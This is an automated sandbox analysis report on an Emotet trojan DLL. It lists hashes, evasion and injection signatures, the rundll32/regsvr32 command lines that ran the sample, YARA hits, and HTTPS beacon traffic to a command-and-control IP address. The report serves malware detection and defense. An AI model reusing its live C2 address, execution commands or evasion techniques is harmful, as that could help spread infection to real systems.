
Windows Analysis Report
x4ByCNJqst.dll

Overview

General Information

Sample Name: x4ByCNJqst.dll
Analysis ID: 626484
MD5: 8978c658ba95819f72866e0ffc41fa81
SHA1: f8eed4cba5ff946b074a9b2f95e2fb92c0427651
SHA256: 50363092e6becfe6ad91c4118fcb2e9207ebb6d2016de3459d56b41fbc3b61c1
Tags: exe, trojan

Detection

Emotet
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Query firmware table information (likely to detect VMs)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Program does not show much activity (idle)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 2212 cmdline: loaddll64.exe "C:\Users\user\Desktop\x4ByCNJqst.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 4280 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 5972 cmdline: rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 5116 cmdline: regsvr32.exe /s C:\Users\user\Desktop\x4ByCNJqst.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 6440 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZqFjKrAb\CiXiSWjn.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 732 cmdline: rundll32.exe C:\Users\user\Desktop\x4ByCNJqst.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 2312 cmdline: rundll32.exe C:\Users\user\Desktop\x4ByCNJqst.dll,DllUnregisterServer MD5: 73C519F050C20580F8A62C849D49215A)
  • svchost.exe (PID: 6544 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4336 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6404 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6944 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6784 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5148 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
Yara matches in memory dumps

Source | Rule | Description | Author | Strings
00000003.00000002.356219703.0000017092640000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
(3 further entries not included in this export)

Yara matches in unpacked PEs

Source | Rule | Description | Author | Strings
2.2.regsvr32.exe.680000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
3.2.rundll32.exe.17092640000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
6.2.regsvr32.exe.f20000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
2.2.regsvr32.exe.680000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
4.2.rundll32.exe.1a5a5ea0000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
(3 further entries not included in this export)

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: x4ByCNJqst.dll | Virustotal: Detection: 38%
Source: https://23.239.0.12/_ | Avira URL Cloud: Label: malware
Source: unknown | HTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.7:49789 version: TLS 1.2
Source: x4ByCNJqst.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.743348166.0000000000C74000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.743348166.0000000000C74000.00000004.00000010.00020000.00000000.sdmp
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose

Networking

Source: C:\Windows\System32\regsvr32.exe | Network Connect: 23.239.0.12 443
Source: Joe Sandbox View | ASN Name: LINODE-APLinodeLLCUS
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Cookie: QDGlPmKOb=TX/dVeT7lyH5ngHmnxMFxqFeFIckgyS+eTvFxPj70GF45WQbYgIR5YD52OsRDc9blkyjiUa0Yqe6pSbgy2DVASEEWQlhPFUSnkyvs1j9fcs/03LtUxyEgokNnTm9BdbgUKLysz+GIHunJ3ICf+MbOMPcxyDQMEPxDtn7pCNcxuY2bJ346K6C6yeS1bR8Vwv7L6AvzN/6XVrUEvcLceWiPnN+L5HntiDuAJ2t3QmxGdGoD743iGvw+oldDKvtdideoP8CRqfM0HELQHL9xZ/PA34HGO1+ThmvKp607np2POFA3Gk1Jr7OalPDwf6Z5NEvJ+AZRsVDKA==
    Host: 23.239.0.12
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 23.239.0.12
Source: unknown | Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown | TCP traffic detected without corresponding DNS query: 23.239.0.12 (reported 9 times)
                      Source: svchost.exe, 00000010.00000003.579913846.000001F4B016D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG",
 equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000010.00000003.579913846.000001F4B016D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG",
 equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000010.00000003.579913846.000001F4B016D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.579932178.000001F4B017E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX",
"SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: regsvr32.exe, 00000006.00000003.428719669.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.743762097.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.597809900.000001F4B0100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.743897114.0000023FCBADD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000010.00000002.597712126.000001F4AF8E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.743897114.0000023FCBADD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://help.disneyplus.com.
Source: regsvr32.exe, 00000006.00000003.428821113.0000000000D92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://23.239.0.12/
Source: regsvr32.exe, 00000006.00000003.428908993.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.428869428.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.743719059.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.428821113.0000000000D92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://23.239.0.12/_
Source: svchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000010.00000003.584551631.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584742502.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584455774.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584636899.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584466682.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584705944.000001F4B0602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584669781.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.hotspotshield.com/
Source: svchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000010.00000003.584551631.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584742502.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584455774.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584636899.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584466682.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584705944.000001F4B0602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584669781.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.hotspotshield.com/terms/
Source: svchost.exe, 00000010.00000003.584551631.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584742502.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584455774.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584636899.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584466682.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584705944.000001F4B0602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584669781.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.pango.co/privacy
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00000001800132F0 InternetReadFile,RtlAllocateHeap

E-Banking Fraud

Source: Yara match | File source: 2.2.regsvr32.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.17092640000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.regsvr32.exe.f20000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.1a5a5ea0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.17092640000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.1a5a5ea0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.regsvr32.exe.f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.356219703.0000017092640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.358233793.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.356042845.000001A5A5EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.743858456.0000000000F20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\regsvr32.exe | File deleted: C:\Windows\System32\ZqFjKrAb\CiXiSWjn.dll:Zone.Identifier
Source: C:\Windows\System32\regsvr32.exe | File created: C:\Windows\system32\ZqFjKrAb\
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00007FF8CA9BA77C
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00007FF8CA9B6F0C
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00007FF8CA9BEB60
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00007FF8CA9BAF70
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00007FF8CA9BFB6C
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00007FF8CA9BFCA0
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00007FF8CA9BB5CC
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00007FF8CA9B895C
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00007FF8CA9B5944
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00007FF8CA9BE6C0
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00007FF8CA9BAA0C
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00640000
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180010FF4
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180028C20
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018002C058
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180009100
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180007958
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018001C964
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018000C608
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180021618
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180013E28
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018001E3AC
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018001DBE8
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018001FC0C
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018000580C
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180022010
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018001481C
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018002A42C
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180011834
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180023831
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180021C3C
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018000703C
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018000AC48
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018000FC48
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180024458
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180006458
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018001C05C
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018001A460
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180029888
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018001D49C
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180008CA0
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00000001800248A8
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180015CB0
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00000001800124B4
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018000C4B4
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00000001800288B8
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00000001800024B8
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018000D8C4
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00000001800250CC
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00000001800190D4
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180017CE4
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00000001800264F0
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00000001800014F8
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C9042_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800179082_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800215102_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F9172_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000551C2_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F1282_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001CD382_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180016D3C2_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F9442_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800181482_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D9502_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800131502_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001ED502_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E9602_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019D602_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001D682_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001496C2_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002D702_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800245742_2_0000000180024574
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800021782_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024D802_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800185982_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800035982_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A9A82_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800119A82_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025DAC2_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018DAC2_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800269B02_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800059B82_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800029BC2_2_00000001800029BC
